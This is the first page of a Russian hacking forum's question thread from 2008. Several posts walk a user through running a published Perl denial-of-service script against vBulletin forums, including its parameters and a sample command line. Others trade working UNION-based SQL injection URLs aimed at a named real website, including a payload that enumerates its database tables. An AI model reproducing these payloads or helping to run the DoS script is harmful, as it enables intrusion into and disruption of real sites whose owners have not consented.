Форум АНТИЧАТ
Страница 1 из 32 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   [Задай Вопрос - Получи Ответ] (https://forum.antichat.xyz/showthread.php?t=80624)

ZAMUT 12.08.2008 16:41
[Задай Вопрос - Получи Ответ]
 
Внимание! Данная тема предназначена для Ваших вопросов. Создавать темы, посвященные какому - либо вопросу - не нужно, все спрашиваем тут, в переделах тематики раздела. Созданные темы, содержащие вопрос будут удаляться, как оффтоп

ReanimatoR 13.08.2008 18:15
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48

Grey 13.08.2008 22:22
Цитата:
Сообщение от ReanimatoR
Выложили Dos скрипт для Vbulletin, но я никак не могу разобраться для какой он версии и какие параметры должны быть, чтобы он сработал. Поможете?(Там идет нагрузка на поиск, но это же вроде старьё, и Jelsoft давно это все фиксануло)
http://forum.antichat.ru/showpost.php?p=811052&postcount=48
1. Насчет версии, тут наверное гугл лучший помощник: вбиваешь кусок текста из сплоента (лучше тот, где идет формирование отправляемого пакета) в гугл и смотришь на заголовки тем в которых нашелся этот сплоент (к сожалению не могу с жопореза нормально просмотреть сайты), но заметил что даты постов с этим сплойтом идут за 2006-2007 год, т.е. он явно старенький и скорее всего не актуальный в новых версиях.

2. Какие параметры?, это видно из исходника сплоента:

Код:
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
Два параметра - хост и директория с форумом, т.е. запускать так:
perl c:/1.pl www.test1.ru /forum/

Обрати внимание имя директории с форумом должно быть вместе с двумя слешами (в начале и конце имени), это видно по тому как формируется пакет:

Код:
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
А если форум находится в корне сайта, то вторым параметром должен быть просто слеш.

P.S. по поводу того что это старье - тут нечему удивлятся, тем кто копипастит всё это глубого побарабану новое оно или старое, а про описание я вообще промолчу.

MVadim 14.08.2008 08:48
гугл сказал что это для версии vBulletin <= 3.6.3

glower 14.08.2008 14:12
всем хай,научите новичка sql инъекции... плиз

satana8920 14.08.2008 14:31
по моему самый лучший мануал по Скулям http://forum.antichat.ru/showthread.php?t=43966
юзай поиск то

viv 14.08.2008 16:33
Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?

AnOcToJI 14.08.2008 16:57
Я не знаю где написать решили тут...
Короче есть в городе провайдер я к нему подключён, он представляет форум внутри сети , но войти может только с подключением внешки который имеет ип вида ***.**.**.**, а Ip сетевой предоставленной провайдером вид 10.*.*.***, так вот вопрос можно ли войти в форум не включай внехи а просто по локалке ?

Jokester 14.08.2008 17:10
Цитата:
Сообщение от viv
Привет всем :)
Подскажите как можно узнать префикс таблиц на атакуемом сайте?

вот ссылочка:http://www.hardvision.ru/index.php3 to=files&action=showCateg&cid=-233+union+select+1,2,3+from+har_user/*

там проходит sql инъекция , как ни пробовал по логики от названия сайта , не получается.
Может есть какие команды?
Там пятая ветка , вся информация в schema:

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,table_name,3+from+information_s chema.tables+limit+17,1/*

viv 14.08.2008 17:20
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса


Время: 22:28
Страница 1 из 32 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице